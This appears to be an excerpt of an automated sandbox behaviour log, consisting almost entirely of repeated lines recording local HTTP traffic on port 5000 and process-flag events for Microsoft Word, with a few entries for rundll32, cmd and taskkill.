Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49338
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
